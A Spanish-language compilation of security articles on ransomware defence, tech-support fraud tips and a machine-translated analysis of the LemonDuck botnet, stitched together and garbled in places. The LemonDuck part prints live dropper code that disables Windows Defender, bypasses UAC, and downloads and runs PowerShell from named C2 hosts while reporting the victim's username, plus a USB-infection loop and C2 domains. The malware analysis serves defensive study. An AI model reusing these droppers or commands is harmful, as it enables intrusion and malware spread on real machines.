• ‎Construya un proceso confiable de gestión de activos para identificar qué necesita ser protegido y quién es responsable. Se debe prestar especial atención a los sistemas‎‎ ‎‎ ‎‎ ‎‎heredados (consulte ‎‎el ‎‎Cuadrante Mágico para el software de gestión de activos‎‎empresariales).‎
• ‎Implemente un proceso de gestión de vulnerabilidades basado en el riesgo que incluya inteligencia de amenazas (TI). El ransomware a menudo se basa en sistemas sin parches para permitir el movimiento lateral. Este debe ser un proceso continuo. El riesgo asociado con las vulnerabilidades cambia a medida que los atacantes explotan las vulnerabilidades (consulte ‎‎ ‎‎Los elementos esenciales de la gestión eficaz de vulnerabilidades).‎
• ‎Elimine los privilegios administrativos locales de los usuarios en los puntos finales y limite el acceso a las aplicaciones empresariales más confidenciales, incluido el correo electrónico, para evitar que la cuenta se vea comprometida (consulte ‎‎ ‎‎Cuadrante mágico para la administración del acceso privilegiado).‎
• ‎Implemente el‎‎escaneo de c‎‎ompliance ‎‎ ‎‎para sistemas mal configurados y no conformes, así como pruebas de penetración y herramientas de simulación de ataques de violación (BAS). ‎‎ ‎
• ‎Implemente ‎‎ ‎‎una ‎‎ ‎‎autenticación segura para usuarios con privilegios, como administradores de bases de datos e infraestructura, y cuentas de servicio. Registre la actividad. Los malos actores a menudo usarán malware conocido y detectado para obtener acceso a credenciales de cuenta con privilegios más altos.‎

‎Los ataques de ransomware suelen seguir el patrón de ataque que se muestra en la Figura 2.‎‎Figura 2: Anatomía de un ataque de ransomware‎

‎Los líderes de SRM deben alinear sus estrategias de seguridad con los patrones y técnicas utilizados por los atacantes. El marco MITRE ATT‎‎&‎‎CK se puede utilizar para evaluar y calificar la protección de una organización contra cada ‎‎ ‎‎fase.‎‎ ‎‎MITRE también proporciona‎‎ ‎‎ ‎‎ ‎‎SHIELD,‎‎que es una base de conocimiento de defensa activa que asigna técnicas de ataque a técnicas de‎‎ defensa, así como un repositorio de TI cibernética ‎‎que‎‎ enumera las técnicas y tácticas ‎‎posteriores‎‎ al compromiso‎‎ utilizadas.‎‎ ‎‎El ataque comienza con la entrada, es decir, el punto inicial de ataque. Esto a menudo toma la forma de un sitio web comprometido entregado a través de un phishing o ataque dirigido. Las puertas de enlace de correo electrónico seguras (SEG) y las puertas de enlace web seguras (SWG) pueden ayudar a proporcionar protección. Tecnologías como el aislamiento web también pueden limitar el impacto. Como se discutió anteriormente, otro método común de ataque es a través de puertos RDP vulnerables. Las pruebas de penetración pueden ser efectivas para encontrar agujeros en las defensas.‎‎Una vez comprometidas, las plataformas de protección de endpoints (EPP), la detección y respuesta de endpoints‎‎(EDR)‎‎y las soluciones de defensa contra amenazas móviles (MTD) deben usarse como parte de la defensa.‎‎ ‎‎Si los equipos internos no tienen el conjunto de habilidades o el ancho de banda necesarios, complemente EDR con servicios administrados (consulte ‎‎ ‎‎la Guía del mercado para servicios administrados de detección y respuesta).‎‎ Las herramientas EDR están diseñadas para detectar la actividad de cifrado y evitar que continúe.‎‎Las máquinas comprometidas reciben instrucciones a través de canales de comando y control. La seguridad dns, los SLB y otras soluciones de detección y respuesta de red (NDR) pueden detectar y bloquear estos canales. Se produce un mayor movimiento de túnel o lateral a medida que el atacante intenta moverse por la organización. Los firewalls de endpoints y la segmentación de redes, así como la fuerte gestión de vulnerabilidades y parches, limitan lo que el atacante es capaz de lograr.‎

‎Implementar medidas de detección para identificar ataques de ransomware‎

‎Inevitablemente, el ransomware puede superar sus defensas y las protecciones puestas en su lugar. Entonces se convierte en una cuestión de qué tan rápido puede detectar el incidente. Muchas de las herramientas descritas para la protección también proporcionarán los datos y la telemetría para la detección. En particular, las herramientas EDR recopilan indicadores de compromiso (IOC) y eventos que pueden no ser suficientes para identificar y prevenir específicamente un ataque, pero pueden mostrar que «puede» haber un ataque en curso. ‎‎ ‎‎EDR también puede ayudar a identificar «madrigueras», donde el ataque permanece en silencio, mientras se recopilan más cuentas y privilegios comprometidos.‎‎La investigación,‎‎interpretación e investigación de estos‎‎ ‎‎ ‎‎eventos y eventos‎‎del ‎‎ ‎‎COI‎‎ ‎‎tienden a requerir un mayor nivel de experiencia. Cada vez más, esto se compra como parte de una solución EDR o como una solución MDR o administrada más amplia. El uso de estos servicios puede ser beneficioso para las organizaciones sin el personal o los conjuntos de habilidades para tener sus propios centros de operaciones de seguridad (SOC).‎‎Otras herramientas de seguridad también entran en juego durante la fase de detección. Los sistemas de prevención de intrusiones (IPS), así como las soluciones de NDR y análisis de tráfico de red (NTA), pueden ayudar a proporcionar una detección temprana (consulte ‎‎ ‎‎la Guía del mercado para detección y respuesta de red).‎‎ Las herramientas de engaño también pueden ser efectivas. Esto puede ser tan simple como configurar cuentas falsas de «administración» que nunca se usan realmente, de modo que, si se intenta usarla, se pueda enviar una alerta.‎‎ ‎‎Otros tipos de señuelos, como plataformas de engaño y honeypots, también se pueden implementar como parte de una estrategia de defensa contra ransomware (consulte‎‎ ‎‎ ‎‎ ‎‎Mejore su función de detección de amenazas con tecnologías de engaño).‎‎Además de los IOC y las alertas provenientes de las herramientas de seguridad, también es importante observar lo que «no está sucediendo». Si‎‎ ‎‎ la copia de seguridad programa un‎‎cambio o una‎‎parada, el volumen de copia de seguridad o las tasas de cambio aumentan inesperadamente. Las instantáneas deshabilitadas en ciertas máquinas, así como las herramientas de seguridad que ya no se ejecutan en las máquinas, podrían indicar que un atacante está dentro de la organización.‎‎Una vez que se ha detectado un ataque de ransomware,‎‎minimizar el impacto es esencial. La técnica más común utilizada es el aislamiento. Hay una variedad de técnicas de aislamiento, y muchas herramientas EDR proporcionan funcionalidad de aislamiento en el dispositivo para permitir que los respondedores de incidentes aíslen las máquinas del resto de la red, al tiempo que permiten el acceso remoto para la corrección.‎‎El aislamiento basado en la red es más un instrumento contundente y requiere la prohibición de dispositivos sospechosos basados en la dirección MAC a nivel de hardware (de ahí la importancia de la gestión de activos maduros). Esto se aplica a los conmutadores de red locales, las redes privadas virtuales (VPN), el control de acceso a la red (NAC) y los puntos de acceso Wi-Fi de la organización. A menudo, esto se convierte en tirar frenéticamente de los cables de red. Sin embargo, esto puede ralentizar las fases de recuperación, ya que requiere acceso físico a los dispositivos para su corrección.‎‎Muchas organizaciones necesitarán asistencia para ayudar a mitigar y recuperarse de un ataque. Los equipos especializados en respuesta a incidentes pueden desempeñar un papel importante, y tener un retenedor de respuesta a incidentes en su lugar puede reducir el costo y la velocidad de la respuesta ‎‎ ‎‎(consulte ‎‎ ‎‎Cada organización debe evaluar el valor de un retenedor de respuesta a incidentes).‎‎Los pasos de recuperación táctica variarán, dependiendo de la organización y el alcance del ransomware, pero implicarán:‎

• ‎Recuperación de datos de copias de seguridad, incluida la verificación de la integridad de esas copias de seguridad y la comprensión de qué datos, si los hay, se han perdido.‎
• ‎Una vez comprometidos, los EPP y EDR, así como las soluciones MTD, deben usarse como parte de la respuesta de remediación para eliminar la amenaza‎‎ y revertir cualquier‎‎ cambio. Como se señaló anteriormente, la recuperación va más allá de la recuperación de los datos; las máquinas infectadas pueden estar «bloqueadas» y pueden requerir acceso físico. Durante la fase de preparación, es importante comprender y planificar cómo se lograría esto.‎
• ‎Validación de la integridad de un dispositivo antes de que se le permita volver a la red.‎
• ‎Actualización o eliminación de credenciales comprometidas; sin esto, el atacante podrá volver a ingresar.‎
• ‎Realice un análisis exhaustivo de la causa raíz de cómo y qué sucedió, incluidos los datos que se han exfiltrado (doxing). El doxing ocurre cuando los malos actores amenazan con divulgar información robada. Esto se está convirtiendo cada vez más en un método secundario de extorsión si una víctima decide no pagar el rescate.‎

‎Los entornos ‎‎de infraestructura como servicio (IaaS)‎‎y plataforma como servicio‎‎(PaaS) son igualmente susceptibles a los ataques de ransomware. Conceptualmente, el‎‎se debe abordar de la misma manera. Lo que cambia son las actividades tácticas que se necesitan ejecutar para aislar los dispositivos / segmentos de red afectados.‎

‎Cree procedimientos ‎‎de respuesta ‎‎posterior‎‎ a‎‎ la identificación mediante la capacitación del personal y la programación de simulacros‎

‎En última instancia, los líderes de SRM deben estar preparados para que un ataque de ransomware tenga éxito y tener planes, procesos y procedimientos en su lugar.‎‎ ‎‎Estos planes deben incluir los aspectos de TI, así como los planes de comunicación tanto con el personal interno como con los socios y proveedores (consulte ‎‎ ‎‎Cómo prepararse y responder a las interrupciones del negocio después de ciberataques agresivos).‎‎ ‎‎Es importante para la ‎‎ ‎‎recuperación‎‎ ‎‎ que los líderes de SRM comuniquen el problema de manera rápida y clara. Proporcione actualizaciones periódicas sobre el estado y cuándo se recuperarán los sistemas hasta el punto en que los sistemas sean utilizables. Varias‎‎ ‎‎ herramientas de simulación de crisis cibernéticas‎‎ ‎‎ pueden ayudar a identificar brechas en procedimientos, roles y responsabilidades.‎‎Estos planes variarán, según el alcance y el éxito de un ataque de ransomware. Puede ser solo una pequeña parte de una organización, y el impacto podría ser mínimo. Para ataques más grandes, el impacto puede ir más allá de la organización para los clientes y socios. Como parte de la preparación, realizar simulacros de incendio regulares o ejercicios de mesa para ensayar una respuesta puede ser ‎‎ ‎‎beneficioso‎‎ ‎‎ (consulte ‎‎ ‎‎Toolkit: Tabletop Exercise for Cyberattack Preparation and Response‎‎).‎‎Una vez que la recuperación esté en progreso, recopile suficiente información para comprender la causa raíz del ataque y comprender qué controles fallaron o no estaban en su lugar. Una vez más, los servicios forenses digitales especializados y los servicios de respuesta a incidentes desempeñan un papel importante en este análisis. Una vez que se recuperan los sistemas, es fundamental implementar las lecciones aprendidas y retroalimentarlas en la fase de preparación.‎

5 consejos de Microsoft para prevenir el fraude cibernético

El negocio del fraude cibernético se ha desarrollado de forma masiva en los últimos años, al grado que se calcula que las pérdidas asociadas a este tipo de prácticas representarían un costo aproximado más de $500,000 millones de dólares cada mes, además de las afectaciones que causa a nivel operativo y reputacional, tanto para personas como para organizaciones. De acuerdo con un estudio de Microsoft sobre fraude en línea, las estafas de soporte técnico juegan un rol crítico en este tipo de ataques, donde tres de cada cinco usuarios alrededor del mundo han sido víctimas de este tipo de ataques.

Haciéndose pasar por empleados de Microsoft o representantes de otras compañías tecnológicas, los estafadores emiten falsas notificaciones a los usuarios. Simulando la atención a una supuesta infección de malware o incidente de seguridad. Lo que ha resultado en más de 6,500 quejas al mes reportando fraudes de soporte técnico en todo el mundo. Las cuales han vulnerado a 65% de los mexicanos encuestados.

Estos acercamientos han pasado de llamadas no deseadas a falsos avisos emergentes en la computadora, adaptando sus tácticas para, en el mejor de los casos, convencer a las víctimas que paguen para “solucionar” un problema inexistente con su dispositivo o software. En el peor de los casos, tratan de robar información personal o financiera y, si se les permite conectarse de forma remota a la computadora para realizar esta “reparación”, a menudo instalarán malware, ransomware u otros programas no deseados que pueden extraer información y/o corromper los datos o dispositivos.

Con el fin de prevenir el fraude cibernético

Es importante considerar que Microsoft no se comunica de forma imprevista con sus clientes. Cualquier atención 1:1 debe ser iniciada por el usuario; del mismo modo, la compañía emite las siguientes recomendaciones para poder detectar a tiempo un intento de estafa cibernética:

• Si se presenta una notificación o mensaje de error con un número telefónico, no se comunique a esa línea. Microsoft no suele incluir ese tipo de información en sus comunicaciones.
• Descargue solamente software de fuentes oficiales. Es peligroso instalar programas de externos, ya que no cuentan con una verificación de seguridad y pueden ser cpor terceros para insertar archivos maliciosos.
• De preferencia utilice Microsoft Edge como su navegador default, ya que su interfaz se encuentra habilitada para bloquear sitios fraudulentos y mensajes pop-up gracias a las capacidades de Microsoft Defender SmartScreen.
• Active la protección antivirus en tiempo real de Windows Security, solución que detecta y elimina los malwares fraudulentos registrados.
• Recuerde que el personal de soporte técnico de Microsoft nunca solicitará pagos en criptomonedas o tarjetas de regalo.

Sin embargo, no siempre es posible identificar oportunamente un fraude cibernético. En el caso de México, 23% de los encuestados han declarado continuar con la dinámica de fraude tras la interacción inicial. Lo que ha impactado en pérdidas monetarias para 14% de los afectados y picos de estrés para el 68%. Ante estas situaciones, se aconseja desinstalar lo antes posible cualquier tipo de archivo indicado por los atacantes. Hacer un escaneo de seguridad para encontrar y mitigar cualquier tipo de malware presente. Además formatear el sistema y cambiar las contraseñas de las cuentas abiertas en el equipo.

‎La lucha contra las amenazas actuales a las empresas y su prevención requieren una protección integral centrada en abordar todo el alcance y el impacto de los ataques. Cualquier cosa que pueda‎‎obtener acceso a las‎‎máquinas, incluso el llamado malware de productos básicos, puede generar amenazas más peligrosas. Hemos visto esto en troyanos bancarios que sirven como punto de entrada para ataques de ransomware y manos en el teclado. LemonDuck, un malware actualizado activamente y robusto que es conocido principalmente por sus objetivos de minería de bots y criptomonedas, siguió la misma trayectoria cuando adoptó un comportamiento más sofisticado y escaló sus operaciones. Hoy en día, más allá de usar recursos para sus actividades tradicionales de bots y minería, LemonDuck roba credenciales, elimina los controles de seguridad, se propaga a través de correos electrónicos, se mueve lateralmente y, en última instancia, deja caer más herramientas para la actividad operada por humanos.‎

‎La amenaza de LemonDuck a las empresas también está en el hecho de que es una amenaza multiplataforma. Es una de las pocas familias de malware bot documentadas que se dirige a los sistemas Linux, así como a los dispositivos Windows. Utiliza una amplia gama de mecanismos‎‎de difusión: correos electrónicos de phishing, exploits, dispositivos USB, fuerza bruta, entre otros,‎‎y ha demostrado que puede aprovechar rápidamente noticias, eventos o el lanzamiento de nuevos exploits para ejecutar campañas efectivas. Por ejemplo, en 2020, se observó el uso de señuelos con temática COVID-19 en ataques por correo electrónico. En 2021, explotó ‎‎las vulnerabilidades‎‎ de Exchange Server recién parcheadas para obtener acceso a sistemas obsoletos.‎

‎Esta amenaza, sin embargo, no se limita a vulnerabilidades nuevas o populares. Continúa utilizando vulnerabilidades más antiguas, que benefician a los atacantes en momentos en que el enfoque cambia a parchear una vulnerabilidad popular en lugar de investigar el compromiso. En particular, LemonDuck elimina a otros atacantes de un dispositivo comprometido al deshacerse del malware de la competencia y prevenir nuevas infecciones mediante parches de las mismas vulnerabilidades que utilizó para obtener acceso.‎

‎En los primeros años, LemonDuck se dirigió fuertemente a China, pero sus operaciones se han expandido desde entonces para incluir a muchos otros países, centrándose en los sectores de fabricación e IoT. Hoy en día, LemonDuck impacta en un rango geográfico muy grande, con los Estados Unidos, Rusia, China, Alemania, el Reino Unido, India, Corea, Canadá, Francia y Vietnam viendo la mayoría de los encuentros.‎

‎Figura 1. Distribución global de la actividad de la red de bots LemonDuck‎

‎En 2021, las campañas de LemonDuck comenzaron a utilizar una infraestructura y herramientas de comando y control (C2) más diversificadas. Esta actualización apoyó el marcado aumento en las acciones de manos en el teclado después de la violación, que variaba dependiendo del valor percibido de los dispositivos comprometidos para los atacantes. A pesar de todas estas actualizaciones, sin embargo, LemonDuck todavía utiliza C2s, funciones, estructuras de script y nombres de variables durante mucho más tiempo que el malware promedio. Esto es probablemente debido a su uso de proveedores de alojamiento a prueba de balas como Epik Holdings, que es poco probable que tome cualquier parte de la infraestructura lemonduck fuera de línea, incluso cuando se informa de acciones maliciosas, lo que permite LemonDuck persistir y seguir siendo una amenaza.‎

‎La investigación en profundidad de las infraestructuras de malware de varios tamaños y operaciones proporciona información valiosa sobre la amplitud de las amenazas a las que se enfrentan las organizaciones hoy en día. En el caso de LemonDuck, la amenaza es multiplataforma, persistente y en constante evolución. Investigaciones como esta enfatizan la importancia de tener una visibilidad completa de la amplia gama de amenazas, así como la capacidad de correlacionar actividades simples y dispares como la minería de monedas con ataques adversarios más peligrosos.‎

‎Infraestructura de LemonDuck y LemonCat‎

‎La documentación más antigua de LemonDuck fue de sus campañas de criptomonedas en mayo de 2019. Estas campañas incluían scripts de PowerShell que empleaban scripts adicionales iniciados por una tarea programada. La tarea se utilizó para traer la herramienta PCASTLE para lograr un par de objetivos: abusar de la explotación EternalBlue SMB, así como usar la fuerza bruta o pasar el hash para moverse lateralmente y comenzar la operación de nuevo. Muchos de estos comportamientos todavía se observan en las campañas de LemondDuck hoy en día.‎

‎LemonDuck lleva el nombre de la variable «Lemon_Duck» en uno de los scripts de PowerShell mencionados. La variable se utiliza a menudo como agente de usuario, junto con los números asignados, para los dispositivos infectados. El formato usaba dos conjuntos de caracteres alfabéticos separados por guiones, por ejemplo: «User-Agent: Lemon-Duck-[A-Z]-[A-Z]». El término todavía aparece en los scripts de PowerShell, así como en muchos de los scripts de ejecución, específicamente en una función llamada SIEX, que se usa para asignar un agente de usuario único durante la conexión a botnets en ataques tan recientemente como junio de 2021.‎

‎LemonDuck utiliza con frecuencia material de código abierto construido a partir de recursos también utilizados por otras redes de bots, por lo que hay muchos componentes de esta amenaza que parecen familiares. Los investigadores de Microsoft son conscientes de dos estructuras operativas distintas, que ambos utilizan el malware LemonDuck pero son potencialmente operados por dos entidades diferentes para objetivos separados.‎

‎La primera, que llamamos la infraestructura «Pato», utiliza infraestructuras históricas discutidas en este informe. Es muy consistente en la ejecución de campañas y realiza actividades de seguimiento limitadas. Esta infraestructura rara vez se ve junto con el compromiso del dispositivo de borde como un método de infección, y es más probable que tenga nombres para mostrar aleatorios para sus sitios C2, y siempre se observa utilizando «Lemon_Duck» explícitamente en el script.‎

‎La segunda infraestructura, a la que‎‎llamamos infraestructura «Cat», por usar principalmente dos dominios con la palabra «cat» en ellos (‎‎sqlnetcat[.] com‎‎, ‎‎netcatkit[.] com‎‎)—‎‎surgió en enero de 2021. Se utilizó en ataques explotando vulnerabilidades en Microsoft Exchange Server. Hoy en día, la infraestructura Cat se utiliza en ataques que normalmente resultan en la instalación de puerta trasera, el robo de credenciales y datos, y la entrega de malware. A menudo se ve la entrega del malware Ramnit.‎

‎Ejemplos de dominios Duck‎	‎Dominios Cat de ejemplo‎
‎cdnimages[.] Xyz‎‎bb3u9[.] con‎‎zz3r0[.] con‎‎pp6r1[.] con‎‎amynx[.] con‎‎ackng[.] con‎‎hwqloan[.] con‎‎js88[.] en‎‎zer9g[.] con‎‎b69kq[.] con‎	‎sqlnetcat[.] con‎‎netcatkit[.] con‎‎abajo[.] sqlnetcat[.] COM‎

‎Las infraestructuras Duck y Cat usan subdominios similares y usan los mismos nombres de tarea, como «blackball». Ambas infraestructuras también utilizan los mismos componentes empaquetados alojados en sitios similares o idénticos para sus scripts de minería, movimiento lateral y eliminación de competencia, así como muchas de las mismas llamadas de función.‎

‎El hecho de que la infraestructura cat se utiliza para campañas más peligrosas no despriorizar las infecciones de malware de la infraestructura duck. En cambio, esta inteligencia agrega un contexto importante para comprender esta amenaza: el mismo conjunto de herramientas, acceso y métodos se puede volver a utilizar a intervalos dinámicos, con un mayor impacto. A pesar de las implicaciones comunes de que los mineros criptomoneda son menos amenazantes que otros programas maliciosos, su funcionalidad principal refleja el software no monetizado, por lo que cualquier infección botnet digno de priorización.‎

‎Figura 2. Cadena de ataque LemonDuck de las infraestructuras Duck y Cat‎

‎Acceso inicial‎

‎LemonDuck se propaga en una variedad de formas, pero los dos métodos principales son (1) compromisos que son iniciados por el borde o facilitados por implantes de bot que se mueven lateralmente dentro de una organización, o (2) campañas de correo electrónico iniciadas por bots.‎

‎LemonDuck actúa como un cargador para muchas otras actividades de seguimiento, pero una si sus funciones principales es propagarse comprometiendo otros sistemas. Desde su primera aparición, los operadores de LemonDuck han aprovechado los análisis contra dispositivos Windows y Linux para SMB, Exchange, SQL, Hadoop, REDIS, RDP u otros dispositivos perimetrales abiertos o débilmente autenticados que podrían ser vulnerables al rociado de contraseñas o vulnerabilidades de aplicaciones como CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon) y CVE-2021-27065 (ProxyLogon).‎

‎Una vez dentro de un sistema con un buzón de Outlook, como parte de su comportamiento de explotación normal, LemonDuck intenta ejecutar un script que utiliza las credenciales presentes en el dispositivo. El script indica al buzón que envíe copias de un mensaje de suplantación de identidad (phishing) con mensajes y datos adjuntos preestablecidos a todos los contactos.‎

‎Debido a este método de mensajería de contacto, no se aplican los controles de seguridad que se basan en determinar si un correo electrónico se envía desde un remitente sospechoso. Esto significa que las políticas de seguridad de correo electrónico que reducen el escaneo o la cobertura del correo interno deben volver a evaluarse, ya que el envío de correos electrónicos a través del raspado de contactos es muy efectivo para evitar los controles de correo electrónico.‎

‎Desde mediados de 2020 hasta marzo de 2021, los temas de correo electrónico y el contenido del cuerpo de LemonDuck se han mantenido estáticos, al igual que los nombres y formatos de los archivos adjuntos. Estos nombres y formatos de archivos adjuntos han cambiado muy poco con respecto a campañas similares que ocurrieron a principios de 2020.‎

‎Asuntos de correo electrónico de ejemplo ‎

‎Ejemplo de contenido del cuerpo del correo electrónico‎

‎La verdad del COVID-19‎‎COVID-19 nCov Información especial OMS‎‎AVISO DE HALTH:CORONAVIRUS‎‎Wtf‎‎Lo que el fcuk‎‎Adiós‎‎carta de despedida‎‎archivo roto‎‎¿Esta es su orden?‎

‎El virus en realidad proviene de los Estados Unidos de América‎‎información muy importante para el Covid-19‎‎consulte el documento adjunto para su acción y discreción.‎‎el brote de CORONAVIRUS es motivo de preocupación, especialmente cuando el personal de forign ha llegado recientemente o llegará a varios intt en un futuro próximo.‎‎¿qué te pasa?¿estás fuera de tu mente!!!!!‎‎¿estás fuera de tu mente!!!!! ¿qué te pasa?‎‎ad ad siéndolo, mantente en contacto‎‎me puedes ayudar a arreglar el archivo,no puedo leerlo‎‎el archivo está roto, no puedo abrirlo‎

‎El archivo adjunto utilizado para estos señuelos es uno de tres tipos: .doc, .js o un .zip que contiene un archivo de .js. Sea cual sea el tipo, el archivo se denomina «Léame». En ocasiones, los tres tipos están presentes en el mismo correo electrónico.‎

‎Figura 3. Correo electrónico de ejemplo‎

‎Aunque muchos proveedores de seguridad detectan javascript, es posible que se clasifique con nombres de detección genéricos. Podría ser valioso para las organizaciones desinfectar JavaScript o VBScript ejecutando o llamando a mensajes (como PowerShell) directamente desde descargas de correo a través de soluciones como ‎‎reglas de detección personalizadas.‎

‎Desde que LemonDuck comenzó a funcionar, el .zip a .js método de ejecución de archivos es el más común. JavaScript ha reemplazado la tarea programada que LemonDuck usó anteriormente para iniciar el script de PowerShell.The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. Este script de PowerShell se ha visto muy similar a lo largo de 2020 y 2021, con cambios menores dependiendo de la versión, lo que indica un desarrollo continuo. A continuación se muestra una comparación de los cambios de las iteraciones más recientes de las descargas entregadas por correo electrónico y las de abril de 2020.‎

‎Script de PowerShell de abril de 2020‎

‎Script de PowerShell de marzo de 2021‎

var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden -c \"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo //This File is broken.

var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')";cmd.run(cmdstr,0,1); //This File is broken.

‎Después de enviar los correos electrónicos, la bandeja de entrada se limpia para eliminar los rastros de estos correos. Este método de autodisparcimiento se intenta en cualquier dispositivo afectado que tenga un buzón, independientemente de si se trata de un servidor de Exchange.‎

‎Otros métodos comunes de infección incluyen el movimiento dentro del entorno comprometido, así como a través de USB y unidades conectadas. Estos procesos a menudo se inician automáticamente y han ocurrido consistentemente a lo largo de la totalidad de la operación de LemonDuck.‎

‎Estos métodos se ejecutan como una serie de scripts de C# que reúnen las unidades disponibles para la infección. También crean una lista en ejecución de unidades que ya están infectadas en función de si encuentra la amenaza ya instalada. Una vez comprobados con la lista en ejecución de unidades infectadas, estos scripts intentan crear un conjunto de archivos ocultos en el directorio de inicio, incluida una copia del ‎‎archivo Léame.js‎‎. Cualquier dispositivo que ha sido afectado por los implantes LemonDuck en cualquier momento podría haber tenido cualquier número de unidades conectadas a él que se ven comprometidas de esta manera. Esto hace que este comportamiento sea un posible vector de entrada para ataques adicionales.‎

DriveInfo[] drives = DriveInfo.GetDrives();
foreach (DriveInfo drive in drives)
{
if (blacklist.Contains(drive.Name))
{ continue;}
Console.WriteLine("Detect drive:"+drive.Name);
if (IsSupported(drive))
{
if (!File.Exists(drive + home + inf_data))
{
Console.WriteLine("Try to infect "+drive.Name);
if (CreateHomeDirectory(drive.Name) && Infect(drive.Name))
{
blacklist.Add(drive.Name);
}
}
else {
Console.WriteLine(drive.Name+" already infected!");
blacklist.Add(drive.Name);
}
}
else{
blacklist.Add(drive.Name);

‎Protección integral contra una operación de malware de gran alcance‎

‎La visibilidad entre dominios y la defensa coordinada entregada por ‎Microsoft 365‎ defensor‎‎ está diseñado para la amplia gama y la creciente sofisticación de las amenazas que LemonDuck ejemplifica. ‎Microsoft 365‎ Defender tiene protecciones líderes en la industria impulsadas por IA que pueden detener amenazas de múltiples componentes como LemonDuck en dominios y plataformas. ‎Microsoft 365‎ Defensor de ‎‎Oficina 365‎‎ detecta los correos electrónicos maliciosos enviados por la botnet LemonDuck para entregar cargas útiles de malware, así como propagar el cargador de bots. Microsoft Defender for Endpoint detecta y bloquea los implantes, las cargas útiles y la actividad malintencionada de LemonDuck en Linux y Windows.‎

‎Más importante aún, ‎Microsoft 365‎ Defender proporciona herramientas de investigación enriquecidas que pueden exponer detecciones de actividad de LemonDuck, incluidos los intentos de comprometer y hacerse un hueco en la red, para que los equipos de operaciones de seguridad puedan responder y resolver estos ataques de manera eficiente y segura. ‎Microsoft 365‎ Defender correlaciona las señales multiplataforma y entre dominios para pintar la cadena de ataque de extremo a extremo, lo que permite a las organizaciones ver el impacto total de un ataque. También publicamos un artículo de análisis de amenazas sobre esta amenaza. ‎Microsoft 365‎ Los clientes de Defender pueden usar este informe para obtener detalles técnicos importantes, orientación para la investigación, incidentes consolidados y pasos para mitigar esta amenaza en particular y los ciberataques modernos en general.‎

Ante un ataque por ransomware los responsables de la seguridad deben ayudar a sus organizaciones a recuperar rápidamente la resiliencia, deben comprender y contrarrestar los nuevos desafíos que plantea este tipo de amenaza, fortalecer las defensas en los recursos humanos, los procesos y la tecnología, además de demostrar por qué la seguridad es esencial para la estrategia de los negocios.

Oswaldo Palacios, Director de Ingeniería de Ventas para México y LATAM de Guardicore, destacó que tras haberse confirmado un ataque de ransomware, los CISO deben evitar que se propague en la red, verificar el tipo de variante de ransomware (los principales de este año son: DoppelPaymer, Sodinokibi, Hades, Ryuk y Conti), aislar lo más posible los activos infectados e investigar cómo ocurrió el ataque, y comprender cabalmente la intrusión y la medición del impacto. 

El pago de los rescates puede abrir la puerta a una mayor criminalidad, por ello es recomendable no hacerlo; desafortunadamente no existe la seguridad de que los datos se puedan recuperar. 

«Es una moneda al aire hacer un pago y además se estaría alentando la ya creciente ola de delitos de este tipo. Existe una cifra negra respecto de las compañías que decidieron pagar para recuperar la información y, por el daño reputacional que añade, no existe un registro de dicha actividad», dijo el directivo. 

Por su parte, el documento Respuesta y recuperación ante el ransomware elaborado por la firma de consultoría Accenture destacó que el ransomware puede crear una crisis de riesgo sistémico en los negocios y en la confianza del consumidor.

Los impactos típicos en los negocios incluyen: disrupción en la producción, la entrega o los servicios al cliente; pérdida de datos comerciales sensibles o información protegida; costos directos de reparación, recuperación o potencial pago de rescate; costos asociados a litigios, que suelen ser demandas colectivas; sanciones legales y regulatorias; y daño a la reputación. 

El directivo reiteró que un ataque de ransomware trae consigo un grave daño en la reputación de una empresa, ya que en algunos países es obligatorio el dar a conocer cuándo se ha sido víctima de este tipo de acontecimientos y, en determinados casos, pagar una multa; con lo cual se pone en entredicho la capacidad de las compañías para hacer frente a los ciberataques. 

Los ataques de ransomware van desde secuestro de información tales como bases de datos, respaldos y demás información crítica; en otros casos, el daño involucra servidores y aplicaciones de producción con lo cual la afectación es aún mayor, ya que la compañía podría dejar de operar y deberá asumir las pérdidas financieras que esto implica. 

A decir de Oswaldo Palacios, desafortunadamente no existe una compañía o herramienta que pueda romper el código de cifrado de un ransomware, por lo cual la estrategia de ciberseguridad se debe basar al 100% en prevenir un evento de este tipo.

«Una opción para adelantarnos a estos eventos maliciosos es el crear microsegmentos de comunicaciones con lo cual podemos asegurarnos de que nuestras joyas de la corona digitales serán accedidas por quien de verdad lo necesite y nos permite conocer al 100% la interacción de nuestro centro de datos. Es importante tener visibilidad sobre todos nuestros activos, ya que no se puede proteger, lo que no se puede ver”, precisó-

Reducir el riesgo de ransomware mediante el uso de una política de segmentación adecuada proviene de su simplicidad: un bit puede viajar por el cable (o un Vswitch) a una máquina diferente (o una VM / contenedor) o puede bloquearse, haciendo que el intento de los atacantes por alcanzar más recursos en la red sea inútil, dando al equipo más tiempo para responder al ataque y actualizar a las partes interesadas clave de la organización para que puedan tomar decisiones informadas sobre el daño de dicho ataque. 

